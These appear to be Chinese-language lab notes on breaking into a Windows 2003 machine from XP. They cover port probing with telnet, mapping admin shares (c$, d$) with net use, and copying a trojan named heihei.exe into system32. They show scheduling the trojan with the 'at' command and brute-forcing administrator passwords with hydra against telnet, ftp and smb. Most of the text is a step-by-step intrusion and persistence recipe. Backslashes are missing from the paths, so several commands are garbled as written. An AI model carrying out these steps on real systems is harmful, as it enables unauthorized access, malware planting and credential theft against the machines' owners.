工具

xp一台，ip：192.168.40.122

win2003一台， ip：192.168.0.116

一、小技巧。

探测端口开没开着，telnet ip 端口，跳出黑框代表开着了。平常用工具探测。

net share 可以看到目标开启了哪些共享文件。

net use \192.168.0.116c$，然后输入目标的账号和密码，就能连接上了。可以当网盘使用。

这样就能把目标的共享资源映射到本地了，这里是分别映射了c$d$与share，为kjl盘。不知道为啥f盘不行。

net use 盘符 /del或者取消所有net use * /del

2、制作木马并植入木马copy d:heihei.exe \192.168.0.116c$windowssystem32 // 把本地d盘下的文件复制到目标的c盘windowssystem32 下。

3、定时上线：net time \192.168.0.116 //查看目标机器的系统时间

at \192.168.0.116 时间（例如16:49）"c: windowssystem32heihei.exe"

at \192.168.0.116查看待运行任务。

可用工具：NTscan，hydra

hydra.exe -l administrator -P e:pass.txt 192.168.0.116 telnet //爆破密码

hydra.exe -l 账号 -P 密码本 ip 协议（ftp、smb）

hydra.exe -L 账号字典 -P 密码字典192.168.0.116 telnet